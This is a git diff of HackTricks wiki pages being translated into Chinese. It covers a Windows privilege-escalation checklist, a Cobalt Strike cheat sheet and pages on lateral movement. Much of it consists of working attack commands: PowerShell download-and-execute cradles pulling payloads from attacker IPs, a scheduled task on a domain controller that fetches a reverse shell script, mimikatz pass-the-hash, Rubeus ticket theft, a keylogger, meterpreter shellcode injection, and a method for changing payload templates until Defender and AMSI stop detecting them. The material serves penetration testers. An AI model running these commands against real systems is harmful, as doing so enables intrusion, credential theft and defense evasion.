+- [ ] [**用户会话**](windows-local-privilege-escalation/#logged-users-sessions)？
+- [ ] 检查 [**用户主目录**](windows-local-privilege-escalation/#home-folders)（访问？）
+- [ ] 检查 [**密码策略**](windows-local-privilege-escalation/#password-policy)
+- [ ] [**剪贴板**](windows-local-privilege-escalation/#get-the-content-of-the-clipboard) 中有什么？
 
-### [Network](windows-local-privilege-escalation/#network)
+### [网络](windows-local-privilege-escalation/#network)
 
-- [ ] Check **current** [**network** **information**](windows-local-privilege-escalation/#network)
-- [ ] Check **hidden local services** restricted to the outside
+- [ ] 检查 **当前** [**网络信息**](windows-local-privilege-escalation/#network)
+- [ ] 检查 **隐藏的本地服务** 是否限制外部访问
 
-### [Running Processes](windows-local-privilege-escalation/#running-processes)
+### [运行中的进程](windows-local-privilege-escalation/#running-processes)
 
-- [ ] Processes binaries [**file and folders permissions**](windows-local-privilege-escalation/#file-and-folder-permissions)
-- [ ] [**Memory Password mining**](windows-local-privilege-escalation/#memory-password-mining)
-- [ ] [**Insecure GUI apps**](windows-local-privilege-escalation/#insecure-gui-apps)
-- [ ] Steal credentials with **interesting processes** via `ProcDump.exe` ? (firefox, chrome, etc ...)
+- [ ] 进程二进制文件 [**文件和文件夹权限**](windows-local-privilege-escalation/#file-and-folder-permissions)
+- [ ] [**内存密码挖掘**](windows-local-privilege-escalation/#memory-password-mining)
+- [ ] [**不安全的 GUI 应用程序**](windows-local-privilege-escalation/#insecure-gui-apps)
+- [ ] 通过 `ProcDump.exe` 偷取 **有趣进程** 的凭据？（firefox, chrome 等 ...）
 
-### [Services](windows-local-privilege-escalation/#services)
+### [服务](windows-local-privilege-escalation/#services)
 
-- [ ] [Can you **modify any service**?](windows-local-privilege-escalation/#permissions)
-- [ ] [Can you **modify** the **binary** that is **executed** by any **service**?](windows-local-privilege-escalation/#modify-service-binary-path)
-- [ ] [Can you **modify** the **registry** of any **service**?](windows-local-privilege-escalation/#services-registry-modify-permissions)
-- [ ] [Can you take advantage of any **unquoted service** binary **path**?](windows-local-privilege-escalation/#unquoted-service-paths)
+- [ ] [你能 **修改任何服务** 吗？](windows-local-privilege-escalation/#permissions)
+- [ ] [你能 **修改** 任何 **服务** 执行的 **二进制文件** 吗？](windows-local-privilege-escalation/#modify-service-binary-path)
+- [ ] [你能 **修改** 任何 **服务** 的 **注册表** 吗？](windows-local-privilege-escalation/#services-registry-modify-permissions)
+- [ ] [你能利用任何 **未加引号的服务** 二进制 **路径** 吗？](windows-local-privilege-escalation/#unquoted-service-paths)
 
-### [**Applications**](windows-local-privilege-escalation/#applications)
+### [**应用程序**](windows-local-privilege-escalation/#applications)
 
-- [ ] **Write** [**permissions on installed applications**](windows-local-privilege-escalation/#write-permissions)
-- [ ] [**Startup Applications**](windows-local-privilege-escalation/#run-at-startup)
-- [ ] **Vulnerable** [**Drivers**](windows-local-privilege-escalation/#drivers)
+- [ ] **写入** [**已安装应用程序的权限**](windows-local-privilege-escalation/#write-permissions)
+- [ ] [**启动应用程序**](windows-local-privilege-escalation/#run-at-startup)
+- [ ] **易受攻击的** [**驱动程序**](windows-local-privilege-escalation/#drivers)
 
-### [DLL Hijacking](windows-local-privilege-escalation/#path-dll-hijacking)
+### [DLL 劫持](windows-local-privilege-escalation/#path-dll-hijacking)
 
-- [ ] Can you **write in any folder inside PATH**?
-- [ ] Is there any known service binary that **tries to load any non-existant DLL**?
-- [ ] Can you **write** in any **binaries folder**?
+- [ ] 你能 **在 PATH 中的任何文件夹写入** 吗？
+- [ ] 是否有任何已知的服务二进制文件 **尝试加载任何不存在的 DLL**？
+- [ ] 你能 **在任何二进制文件夹中写入** 吗？
 
-### [Network](windows-local-privilege-escalation/#network)
+### [网络](windows-local-privilege-escalation/#network)
 
-- [ ] Enumerate the network (shares, interfaces, routes, neighbours, ...)
-- [ ] Take a special look at network services listening on localhost (127.0.0.1)
+- [ ] 枚举网络（共享、接口、路由、邻居等...）
+- [ ] 特别关注监听在本地主机（127.0.0.1）上的网络服务
 
-### [Windows Credentials](windows-local-privilege-escalation/#windows-credentials)
+### [Windows 凭据](windows-local-privilege-escalation/#windows-credentials)
 
-- [ ] [**Winlogon** ](windows-local-privilege-escalation/#winlogon-credentials)credentials
-- [ ] [**Windows Vault**](windows-local-privilege-escalation/#credentials-manager-windows-vault) credentials that you could use?
-- [ ] Interesting [**DPAPI credentials**](windows-local-privilege-escalation/#dpapi)?
-- [ ] Passwords of saved [**Wifi networks**](windows-local-privilege-escalation/#wifi)?
-- [ ] Interesting info in [**saved RDP Connections**](windows-local-privilege-escalation/#saved-rdp-connections)?
-- [ ] Passwords in [**recently run commands**](windows-local-privilege-escalation/#recently-run-commands)?
-- [ ] [**Remote Desktop Credentials Manager**](windows-local-privilege-escalation/#remote-desktop-credential-manager) passwords?
-- [ ] [**AppCmd.exe** exists](windows-local-privilege-escalation/#appcmd-exe)? Credentials?
-- [ ] [**SCClient.exe**](windows-local-privilege-escalation/#scclient-sccm)? DLL Side Loading?
+- [ ] [**Winlogon**](windows-local-privilege-escalation/#winlogon-credentials) 凭据
+- [ ] [**Windows Vault**](windows-local-privilege-escalation/#credentials-manager-windows-vault) 中你可以使用的凭据？
+- [ ] 有趣的 [**DPAPI 凭据**](windows-local-privilege-escalation/#dpapi)？
+- [ ] 保存的 [**Wifi 网络**](windows-local-privilege-escalation/#wifi) 密码？
+- [ ] [**保存的 RDP 连接**](windows-local-privilege-escalation/#saved-rdp-connections) 中有趣的信息？
+- [ ] [**最近运行的命令**](windows-local-privilege-escalation/#recently-run-commands) 中的密码？
+- [ ] [**远程桌面凭据管理器**](windows-local-privilege-escalation/#remote-desktop-credential-manager) 密码？
+- [ ] [**AppCmd.exe** 存在](windows-local-privilege-escalation/#appcmd-exe)吗？凭据？
+- [ ] [**SCClient.exe**](windows-local-privilege-escalation/#scclient-sccm)？DLL 侧加载？
 
-### [Files and Registry (Credentials)](windows-local-privilege-escalation/#files-and-registry-credentials)
+### [文件和注册表（凭据）](windows-local-privilege-escalation/#files-and-registry-credentials)
 
-- [ ] **Putty:** [**Creds**](windows-local-privilege-escalation/#putty-creds) **and** [**SSH host keys**](windows-local-privilege-escalation/#putty-ssh-host-keys)
-- [ ] [**SSH keys in registry**](windows-local-privilege-escalation/#ssh-keys-in-registry)?
-- [ ] Passwords in [**unattended files**](windows-local-privilege-escalation/#unattended-files)?
-- [ ] Any [**SAM & SYSTEM**](windows-local-privilege-escalation/#sam-and-system-backups) backup?
-- [ ] [**Cloud credentials**](windows-local-privilege-escalation/#cloud-credentials)?
-- [ ] [**McAfee SiteList.xml**](windows-local-privilege-escalation/#mcafee-sitelist.xml) file?
-- [ ] [**Cached GPP Password**](windows-local-privilege-escalation/#cached-gpp-pasword)?
-- [ ] Password in [**IIS Web config file**](windows-local-privilege-escalation/#iis-web-config)?
-- [ ] Interesting info in [**web** **logs**](windows-local-privilege-escalation/#logs)?
-- [ ] Do you want to [**ask for credentials**](windows-local-privilege-escalation/#ask-for-credentials) to the user?
-- [ ] Interesting [**files inside the Recycle Bin**](windows-local-privilege-escalation/#credentials-in-the-recyclebin)?
-- [ ] Other [**registry containing credentials**](windows-local-privilege-escalation/#inside-the-registry)?
-- [ ] Inside [**Browser data**](windows-local-privilege-escalation/#browsers-history) (dbs, history, bookmarks, ...)?
-- [ ] [**Generic password search**](windows-local-privilege-escalation/#generic-password-search-in-files-and-registry) in files and registry
-- [ ] [**Tools**](windows-local-privilege-escalation/#tools-that-search-for-passwords) to automatically search for passwords
+- [ ] **Putty:** [**凭据**](windows-local-privilege-escalation/#putty-creds) **和** [**SSH 主机密钥**](windows-local-privilege-escalation/#putty-ssh-host-keys)
+- [ ] [**注册表中的 SSH 密钥**](windows-local-privilege-escalation/#ssh-keys-in-registry)？
+- [ ] [**无人值守文件**](windows-local-privilege-escalation/#unattended-files) 中的密码？
+- [ ] 有任何 [**SAM & SYSTEM**](windows-local-privilege-escalation/#sam-and-system-backups) 备份吗？
+- [ ] [**云凭据**](windows-local-privilege-escalation/#cloud-credentials)？
+- [ ] [**McAfee SiteList.xml**](windows-local-privilege-escalation/#mcafee-sitelist.xml) 文件？
+- [ ] [**缓存的 GPP 密码**](windows-local-privilege-escalation/#cached-gpp-pasword)？
+- [ ] [**IIS Web 配置文件**](windows-local-privilege-escalation/#iis-web-config) 中的密码？
+- [ ] [**Web 日志**](windows-local-privilege-escalation/#logs) 中有趣的信息？
+- [ ] 你想要 [**向用户请求凭据**](windows-local-privilege-escalation/#ask-for-credentials) 吗？
+- [ ] [**回收站中的有趣文件**](windows-local-privilege-escalation/#credentials-in-the-recyclebin)？
+- [ ] 其他 [**包含凭据的注册表**](windows-local-privilege-escalation/#inside-the-registry)？
+- [ ] [**浏览器数据**](windows-local-privilege-escalation/#browsers-history) 中（数据库、历史记录、书签等）？
+- [ ] [**通用密码搜索**](windows-local-privilege-escalation/#generic-password-search-in-files-and-registry) 在文件和注册表中
+- [ ] [**工具**](windows-local-privilege-escalation/#tools-that-search-for-passwords) 自动搜索密码
 
-### [Leaked Handlers](windows-local-privilege-escalation/#leaked-handlers)
+### [泄露的处理程序](windows-local-privilege-escalation/#leaked-handlers)
 
-- [ ] Have you access to any handler of a process run by administrator?
+- [ ] 你是否可以访问由管理员运行的任何进程的处理程序？
 
-### [Pipe Client Impersonation](windows-local-privilege-escalation/#named-pipe-client-impersonation)
+### [管道客户端冒充](windows-local-privilege-escalation/#named-pipe-client-impersonation)
 
-- [ ] Check if you can abuse it
+- [ ] 检查你是否可以利用它
 
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/cobalt-strike.md b/src/windows-hardening/cobalt-strike.md
index b2f3eba1e..deb8022a6 100644
--- a/src/windows-hardening/cobalt-strike.md
+++ b/src/windows-hardening/cobalt-strike.md
@@ -4,16 +4,16 @@
 
 ### C2 Listeners
 
-`Cobalt Strike -> Listeners -> Add/Edit` then you can select where to listen, which kind of beacon to use (http, dns, smb...) and more.
+`Cobalt Strike -> Listeners -> Add/Edit` 然后您可以选择监听的位置，使用哪种信标（http, dns, smb...）等。
 
 ### Peer2Peer Listeners
 
-The beacons of these listeners don't need to talk to the C2 directly, they can communicate to it through other beacons.
+这些监听器的信标不需要直接与C2通信，它们可以通过其他信标与其通信。
 
-`Cobalt Strike -> Listeners -> Add/Edit` then you need to select the TCP or SMB beacons
+`Cobalt Strike -> Listeners -> Add/Edit` 然后您需要选择TCP或SMB信标
 
-* The **TCP beacon will set a listener in the port selected**. To connect to a TCP beacon use the command `connect <ip> <port>` from another beacon
-* The **smb beacon will listen in a pipename with the selected name**. To connect to a SMB beacon you need to use the command `link [target] [pipe]`.
+* **TCP信标将在所选端口设置监听器**。要连接到TCP信标，请使用命令 `connect <ip> <port>` 从另一个信标
+* **smb信标将在选定名称的管道中监听**。要连接到SMB信标，您需要使用命令 `link [target] [pipe]`。
 
 ### Generate & Host payloads
 
@@ -21,18 +21,18 @@ The beacons of these listeners don't need to talk to the C2 directly, they can c
 
 `Attacks -> Packages ->`&#x20;
 
-* **`HTMLApplication`** for HTA files
-* **`MS Office Macro`** for an office document with a macro
-* **`Windows Executable`** for a .exe, .dll orr service .exe
-* **`Windows Executable (S)`** for a **stageless** .exe, .dll or service .exe (better stageless than staged, less IoCs)
+* **`HTMLApplication`** 用于HTA文件
+* **`MS Office Macro`** 用于带有宏的办公文档
+* **`Windows Executable`** 用于.exe, .dll或服务.exe
+* **`Windows Executable (S)`** 用于**无阶段**的.exe, .dll或服务.exe（无阶段比有阶段更好，IoCs更少）
 
 #### Generate & Host payloads
 
-`Attacks -> Web Drive-by -> Scripted Web Delivery (S)` This will generate a script/executable to download the beacon from cobalt strike in formats such as: bitsadmin, exe, powershell and python
+`Attacks -> Web Drive-by -> Scripted Web Delivery (S)` 这将生成一个脚本/可执行文件，以从cobalt strike下载信标，格式包括：bitsadmin, exe, powershell和python
 
 #### Host Payloads
 
-If you already has the file you want to host in a web sever just go to `Attacks -> Web Drive-by -> Host File` and select the file to host and web server config.
+如果您已经有要在Web服务器上托管的文件，只需转到 `Attacks -> Web Drive-by -> Host File` 并选择要托管的文件和Web服务器配置。
 
 ### Beacon Options
 
@@ -40,17 +40,17 @@ If you already has the file you want to host in a web sever just go to `Attacks
 execute-assembly &#x3C;/path/to/executable.exe>
 
 # Screenshots
-printscreen    # Take a single screenshot via PrintScr method
-screenshot     # Take a single screenshot
-screenwatch    # Take periodic screenshots of desktop
-## Go to View -> Screenshots to see them
+printscreen    # 通过PrintScr方法拍摄单个屏幕截图
+screenshot     # 拍摄单个屏幕截图
+screenwatch    # 定期拍摄桌面截图
+## 转到View -> Screenshots查看它们
 
 # keylogger
 keylogger [pid] [x86|x64]
-## View > Keystrokes to see the keys pressed
+## View > Keystrokes查看按下的键
 
 # portscan
-portscan [pid] [arch] [targets] [ports] [arp|icmp|none] [max connections] # Inject portscan action inside another process
+portscan [pid] [arch] [targets] [ports] [arp|icmp|none] [max connections] # 在另一个进程中注入端口扫描操作
 portscan [targets] [ports] [arp|icmp|none] [max connections]
 
 # Powershell
@@ -60,10 +60,10 @@ powershell &#x3C;just write powershell cmd here>
 
 # User impersonation
 ## Token generation with creds
-make_token [DOMAIN\user] [password] #Create token to impersonate a user in the network
-ls \\computer_name\c$ # Try to use generated token to access C$ in a computer
-rev2self # Stop using token generated with make_token
-## The use of make_token generates event 4624: An account was successfully logged on.  This event is very common in a Windows domain, but can be narrowed down by filtering on the Logon Type.  As mentioned above, it uses LOGON32_LOGON_NEW_CREDENTIALS which is type 9.
+make_token [DOMAIN\user] [password] #创建用于在网络中模拟用户的令牌
+ls \\computer_name\c$ # 尝试使用生成的令牌访问计算机中的C$
+rev2self # 停止使用make_token生成的令牌
+## 使用make_token会生成事件4624：账户成功登录。 该事件在Windows域中非常常见，但可以通过过滤登录类型来缩小范围。 如上所述，它使用LOGON32_LOGON_NEW_CREDENTIALS，类型为9。
 
 # UAC Bypass
 elevate svc-exe &#x3C;listener>
@@ -71,106 +71,106 @@ elevate uac-token-duplication &#x3C;listener>
 runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
 
 ## Steal token from pid
-## Like make_token but stealing the token from a process
-steal_token [pid] # Also, this is useful for network actions, not local actions
-## From the API documentation we know that this logon type "allows the caller to clone its current token". This is why the Beacon output says Impersonated &#x3C;current_username> - it's impersonating our own cloned token.
-ls \\computer_name\c$ # Try to use generated token to access C$ in a computer
-rev2self # Stop using token from steal_token
+## 类似于make_token，但从进程中窃取令牌
+steal_token [pid] # 此外，这对于网络操作而非本地操作很有用
+## 从API文档中我们知道，这种登录类型“允许调用者克隆其当前令牌”。 这就是信标输出显示模拟&#x3C;current_username>的原因 - 它正在模拟我们自己的克隆令牌。
+ls \\computer_name\c$ # 尝试使用生成的令牌访问计算机中的C$
+rev2self # 停止使用steal_token的令牌
 
-## Launch process with nwe credentials
-spawnas [domain\username] [password] [listener] #Do it from a directory with read access like: cd C:\
-## Like make_token, this will generate Windows event 4624: An account was successfully logged on but with a logon type of 2 (LOGON32_LOGON_INTERACTIVE).  It will detail the calling user (TargetUserName) and the impersonated user (TargetOutboundUserName).
+## 使用新凭据启动进程
+spawnas [domain\username] [password] [listener] #从具有读取权限的目录执行，例如：cd C:\
+## 类似于make_token，这将生成Windows事件4624：账户成功登录，但登录类型为2（LOGON32_LOGON_INTERACTIVE）。 它将详细说明调用用户（TargetUserName）和模拟用户（TargetOutboundUserName）。
 
 ## Inject into process
 inject [pid] [x64|x86] [listener]
-## From an OpSec point of view: Don't perform cross-platform injection unless you really have to (e.g. x86 -> x64 or x64 -> x86).
+## 从OpSec的角度来看：除非真的有必要，否则不要执行跨平台注入（例如x86 -> x64或x64 -> x86）。
 
 ## Pass the hash
-## This modification process requires patching of LSASS memory which is a high-risk action, requires local admin privileges and not all that viable if Protected Process Light (PPL) is enabled.
+## 此修改过程需要对LSASS内存进行修补，这是一个高风险操作，需要本地管理员权限，并且如果启用了受保护进程轻量级（PPL），则不太可行。
 pth [pid] [arch] [DOMAIN\user] [NTLM hash]
 pth [DOMAIN\user] [NTLM hash]
 
 ## Pass the hash through mimikatz
 mimikatz sekurlsa::pth /user:&#x3C;username> /domain:&#x3C;DOMAIN> /ntlm:&#x3C;NTLM HASH> /run:"powershell -w hidden"
-## Withuot /run, mimikatz spawn a cmd.exe, if you are running as a user with Desktop, he will see the shell (if you are running as SYSTEM you are good to go)
-steal_token &#x3C;pid> #Steal token from process created by mimikatz
+## 如果没有/run，mimikatz会生成cmd.exe，如果您以具有桌面的用户身份运行，他将看到shell（如果您以SYSTEM身份运行，则可以继续）
+steal_token &#x3C;pid> #从mimikatz创建的进程中窃取令牌
 
 ## Pass the ticket
-## Request a ticket
+## 请求票证
 execute-assembly C:\path\Rubeus.exe asktgt /user:&#x3C;username> /domain:&#x3C;domain> /aes256:&#x3C;aes_keys> /nowrap /opsec
-## Create a new logon session to use with the new ticket (to not overwrite the compromised one)
+## 创建一个新的登录会话以使用新票证（以免覆盖被攻陷的票证）
 make_token &#x3C;domain>\&#x3C;username> DummyPass
-## Write the ticket in the attacker machine from a poweshell session &#x26; load it
+## 从powershell会话中将票证写入攻击者机器并加载
 [System.IO.File]::WriteAllBytes("C:\Users\Administrator\Desktop\jkingTGT.kirbi", [System.Convert]::FromBase64String("[...ticket...]"))
 kerberos_ticket_use C:\Users\Administrator\Desktop\jkingTGT.kirbi
 
 ## Pass the ticket from SYSTEM
-## Generate a new process with the ticket
+## 使用票证生成新进程
 execute-assembly C:\path\Rubeus.exe asktgt /user:&#x3C;USERNAME> /domain:&#x3C;DOMAIN> /aes256:&#x3C;AES KEY> /nowrap /opsec /createnetonly:C:\Windows\System32\cmd.exe
-## Steal the token from that process
+## 从该进程中窃取令牌
 steal_token &#x3C;pid>
 
 ## Extract ticket + Pass the ticket
 ### List tickets
 execute-assembly C:\path\Rubeus.exe triage
-### Dump insteresting ticket by luid
+### Dump interesting ticket by luid
 execute-assembly C:\path\Rubeus.exe dump /service:krbtgt /luid:&#x3C;luid> /nowrap
-### Create new logon session, note luid and processid
+### 创建新的登录会话，注意luid和processid
 execute-assembly C:\path\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe
-### Insert ticket in generate logon session
+### 在生成的登录会话中插入票证
 execute-assembly C:\path\Rubeus.exe ptt /luid:0x92a8c /ticket:[...base64-ticket...]
-### Finally, steal the token from that new process
+### 最后，从新进程中窃取令牌
 steal_token &#x3C;pid>
 
 # Lateral Movement
-## If a token was created it will be used
+## 如果创建了令牌，将会使用它
 jump [method] [target] [listener]
-## Methods:
-## psexec                    x86   Use a service to run a Service EXE artifact
-## psexec64                  x64   Use a service to run a Service EXE artifact
-## psexec_psh                x86   Use a service to run a PowerShell one-liner
-## winrm                     x86   Run a PowerShell script via WinRM
-## winrm64                   x64   Run a PowerShell script via WinRM
+## 方法：
+## psexec                    x86   使用服务运行服务EXE工件
+## psexec64                  x64   使用服务运行服务EXE工件
+## psexec_psh                x86   使用服务运行PowerShell一行代码
+## winrm                     x86   通过WinRM运行PowerShell脚本
+## winrm64                   x64   通过WinRM运行PowerShell脚本
 
 remote-exec [method] [target] [command]
-## Methods:
-<strong>## psexec                          Remote execute via Service Control Manager
-</strong>## winrm                           Remote execute via WinRM (PowerShell)
-## wmi                             Remote execute via WMI
+## 方法：
+<strong>## psexec                          通过服务控制管理器远程执行
+</strong>## winrm                           通过WinRM（PowerShell）远程执行
+## wmi                             通过WMI远程执行
 
-## To execute a beacon with wmi (it isn't ins the jump command) just upload the beacon and execute it
+## 要使用wmi执行信标（它不在jump命令中），只需上传信标并执行
 beacon> upload C:\Payloads\beacon-smb.exe
 beacon> remote-exec wmi srv-1 C:\Windows\beacon-smb.exe
 
 
 # Pass session to Metasploit - Through listener
-## On metaploit host
+## 在metaploit主机上
 msf6 > use exploit/multi/handler
 msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
 msf6 exploit(multi/handler) > set LHOST eth0
 msf6 exploit(multi/handler) > set LPORT 8080
 msf6 exploit(multi/handler) > exploit -j
 
-## On cobalt: Listeners > Add and set the Payload to Foreign HTTP. Set the Host to 10.10.5.120, the Port to 8080 and click Save.
+## 在cobalt上：Listeners > Add并将Payload设置为Foreign HTTP。 将Host设置为10.10.5.120，将Port设置为8080，然后单击保存。
 beacon> spawn metasploit
-## You can only spawn x86 Meterpreter sessions with the foreign listener.
+## 您只能使用外部监听器生成x86 Meterpreter会话。
 
 # Pass session to Metasploit - Through shellcode injection
-## On metasploit host
+## 在metasploit主机上
 msfvenom -p windows/x64/meterpreter_reverse_http LHOST=&#x3C;IP> LPORT=&#x3C;PORT> -f raw -o /tmp/msf.bin
-## Run msfvenom and prepare the multi/handler listener
+## 运行msfvenom并准备multi/handler监听器
 
-## Copy bin file to cobalt strike host
+## 将bin文件复制到cobalt strike主机
 ps
-shinject &#x3C;pid> x64 C:\Payloads\msf.bin #Inject metasploit shellcode in a x64 process
+shinject &#x3C;pid> x64 C:\Payloads\msf.bin #在x64进程中注入metasploit shellcode
 
 # Pass metasploit session to cobalt strike
-## Fenerate stageless Beacon shellcode, go to Attacks > Packages > Windows Executable (S), select the desired listener, select Raw as the Output type and select Use x64 payload.
-## Use post/windows/manage/shellcode_inject in metasploit to inject the generated cobalt srike shellcode
+## 生成无阶段信标shellcode，转到Attacks > Packages > Windows Executable (S)，选择所需的监听器，选择Raw作为输出类型，并选择使用x64有效负载。
+## 在metasploit中使用post/windows/manage/shellcode_inject注入生成的cobalt strike shellcode
 
 
 # Pivoting
-## Open a socks proxy in the teamserver
+## 在teamserver中打开socks代理
 beacon> socks 1080
 
 # SSH connection
@@ -180,38 +180,27 @@ beacon> ssh 10.10.17.12:22 username password</code></pre>
 
 ### Artifact Kit
 
-Usually in `/opt/cobaltstrike/artifact-kit` you can find the code and pre-compiled templates (in `/src-common`) of the payloads that cobalt strike is going to use to generate the binary beacons.
+通常在`/opt/cobaltstrike/artifact-kit`中，您可以找到cobalt strike将用于生成二进制信标的代码和预编译模板（在`/src-common`中）。
 
-Using [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck) with the generated backdoor (or just with the compiled template) you can find what is making defender trigger. It's usually a string. Therefore you can just modify the code that is generating the backdoor so that string doesn't appear in the final binary.
-
-After modifying the code just run `./build.sh` from the same directory and copy the `dist-pipe/` folder into the Windows client in `C:\Tools\cobaltstrike\ArtifactKit`.
+使用[ThreatCheck](https://github.com/rasta-mouse/ThreatCheck)与生成的后门（或仅使用编译的模板），您可以找到触发防御者的原因。 通常是一个字符串。 因此，您只需修改生成后门的代码，以便该字符串不会出现在最终的二进制文件中。
 
+修改代码后，只需从同一目录运行`./build.sh`并将`dist-pipe/`文件夹复制到Windows客户端的`C:\Tools\cobaltstrike\ArtifactKit`中。
 ```
 pscp -r root@kali:/opt/cobaltstrike/artifact-kit/dist-pipe .
 ```
+不要忘记加载激进脚本 `dist-pipe\artifact.cna` 以指示 Cobalt Strike 使用我们想要的磁盘资源，而不是加载的资源。
 
-Don't forget to load the aggressive script `dist-pipe\artifact.cna` to indicate Cobalt Strike to use the resources from disk that we want and not the ones loaded.
+### 资源包
 
-### Resource Kit
-
-The ResourceKit folder contains the templates for Cobalt Strike's script-based payloads including PowerShell, VBA and HTA.
-
-Using [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck) with the templates you can find what is defender (AMSI in this case) not liking and modify it:
+ResourceKit 文件夹包含 Cobalt Strike 基于脚本的有效载荷模板，包括 PowerShell、VBA 和 HTA。
 
+使用 [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck) 和模板，您可以找到防御者（在这种情况下是 AMSI）不喜欢的内容并进行修改：
 ```
 .\ThreatCheck.exe -e AMSI -f .\cobaltstrike\ResourceKit\template.x64.ps1
 ```
+修改检测到的行可以生成一个不会被捕获的模板。
 
-Modifying the detected lines one can generate a template that won't be caught.
-
-Don't forget to load the aggressive script `ResourceKit\resources.cna` to indicate Cobalt Strike to luse the resources from disk that we want and not the ones loaded.
-
-
-
-
-
-
-
+不要忘记加载激进脚本 `ResourceKit\resources.cna`，以指示 Cobalt Strike 使用我们想要的磁盘资源，而不是加载的资源。
 ```bash
 cd C:\Tools\neo4j\bin
 neo4j.bat console
@@ -234,4 +223,3 @@ pscp -r root@kali:/opt/cobaltstrike/artifact-kit/dist-pipe .
 
 ```
 
-
diff --git a/src/windows-hardening/lateral-movement/README.md b/src/windows-hardening/lateral-movement/README.md
index 523202d49..6ead4fd75 100644
--- a/src/windows-hardening/lateral-movement/README.md
+++ b/src/windows-hardening/lateral-movement/README.md
@@ -1,8 +1,8 @@
-# Lateral Movement
+# 横向移动
 
 {{#include ../../banners/hacktricks-training.md}}
 
-There are different different ways to execute commands in external systems, here you can find the explanations on how the main Windows lateral movements techniques work:
+有不同的方法在外部系统中执行命令，这里可以找到主要的 Windows 横向移动技术的工作原理说明：
 
 - [**PsExec**](psexec-and-winexec.md)
 - [**SmbExec**](smbexec.md)
@@ -15,4 +15,3 @@ There are different different ways to execute commands in external systems, here
 - [**Pass the AzureAD Certificate**](https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-lateral-movements/az-pass-the-certificate) (cloud)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/lateral-movement/atexec.md b/src/windows-hardening/lateral-movement/atexec.md
index 3829b036f..0c18de4cc 100644
--- a/src/windows-hardening/lateral-movement/atexec.md
+++ b/src/windows-hardening/lateral-movement/atexec.md
@@ -2,16 +2,13 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## How Does it works
-
-At allows to schedule tasks in hosts where you know username/(password/Hash). So, you can use it to execute commands in other hosts and get the output.
+## 它是如何工作的
 
+At 允许在你知道用户名/(密码/哈希)的主机上调度任务。因此，你可以使用它在其他主机上执行命令并获取输出。
 ```
 At \\victim 11:00:00PM shutdown -r
 ```
-
-Using schtasks you need first to create the task and then call it:
-
+使用 schtasks，您需要首先创建任务，然后调用它：
 ```bash
 schtasks /create /n <TASK_NAME> /tr C:\path\executable.exe /sc once /st 00:00 /S <VICTIM> /RU System
 schtasks /run /tn <TASK_NAME> /S <VICTIM>
@@ -21,14 +18,10 @@ schtasks /run /tn <TASK_NAME> /S <VICTIM>
 schtasks /create /S dcorp-dc.domain.local /SC Weekely /RU "NT Authority\SYSTEM" /TN "MyNewtask" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.X/InvokePowerShellTcp.ps1''')'"
 schtasks /run /tn "MyNewtask" /S dcorp-dc.domain.local
 ```
-
-You can also use [SharpLateral](https://github.com/mertdas/SharpLateral):
-
+您还可以使用 [SharpLateral](https://github.com/mertdas/SharpLateral)：
 ```bash
 SharpLateral schedule HOSTNAME C:\Users\Administrator\Desktop\malware.exe TaskName
 ```
-
-More information about the [**use of schtasks with silver tickets here**](../active-directory-methodology/silver-ticket.md#host).
+有关[**使用 schtasks 和银票的更多信息在这里**](../active-directory-methodology/silver-ticket.md#host)。
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/lateral-movement/dcom-exec.md b/src/windows-hardening/lateral-movement/dcom-exec.md
index 538e316d6..55eefffac 100644
--- a/src/windows-hardening/lateral-movement/dcom-exec.md
+++ b/src/windows-hardening/lateral-movement/dcom-exec.md
@@ -4,33 +4,26 @@
 
 ## MMC20.Application
 
-**For more info about this technique chech the original post from [https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/](https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/)**
-
-Distributed Component Object Model (DCOM) objects present an interesting capability for network-based interactions with objects. Microsoft provides comprehensive documentation for both DCOM and Component Object Model (COM), accessible [here for DCOM](https://msdn.microsoft.com/en-us/library/cc226801.aspx) and [here for COM](<https://msdn.microsoft.com/en-us/library/windows/desktop/ms694363(v=vs.85).aspx>). A list of DCOM applications can be retrieved using the PowerShell command:
+**有关此技术的更多信息，请查看原始帖子 [https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/](https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/)**
 
+分布式组件对象模型（DCOM）对象为基于网络的对象交互提供了有趣的能力。微软为DCOM和组件对象模型（COM）提供了全面的文档，分别可以在 [这里查看DCOM](https://msdn.microsoft.com/en-us/library/cc226801.aspx) 和 [这里查看COM](<https://msdn.microsoft.com/en-us/library/windows/desktop/ms694363(v=vs.85).aspx>)。可以使用PowerShell命令检索DCOM应用程序列表：
 ```bash
 Get-CimInstance Win32_DCOMApplication
 ```
+COM对象，[MMC应用程序类（MMC20.Application）](https://technet.microsoft.com/en-us/library/cc181199.aspx)，使得MMC插件操作的脚本化成为可能。值得注意的是，该对象在`Document.ActiveView`下包含一个`ExecuteShellCommand`方法。有关此方法的更多信息，请参见[这里](<https://msdn.microsoft.com/en-us/library/aa815396(v=vs.85).aspx>)。检查它的运行：
 
-The COM object, [MMC Application Class (MMC20.Application)](https://technet.microsoft.com/en-us/library/cc181199.aspx), enables scripting of MMC snap-in operations. Notably, this object contains a `ExecuteShellCommand` method under `Document.ActiveView`. More information about this method can be found [here](<https://msdn.microsoft.com/en-us/library/aa815396(v=vs.85).aspx>). Check it running:
-
-This feature facilitates the execution of commands over a network through a DCOM application. To interact with DCOM remotely as an admin, PowerShell can be utilized as follows:
-
+此功能通过DCOM应用程序促进了通过网络执行命令。要以管理员身份远程与DCOM交互，可以使用PowerShell，如下所示：
 ```powershell
 [activator]::CreateInstance([type]::GetTypeFromProgID("<DCOM_ProgID>", "<IP_Address>"))
 ```
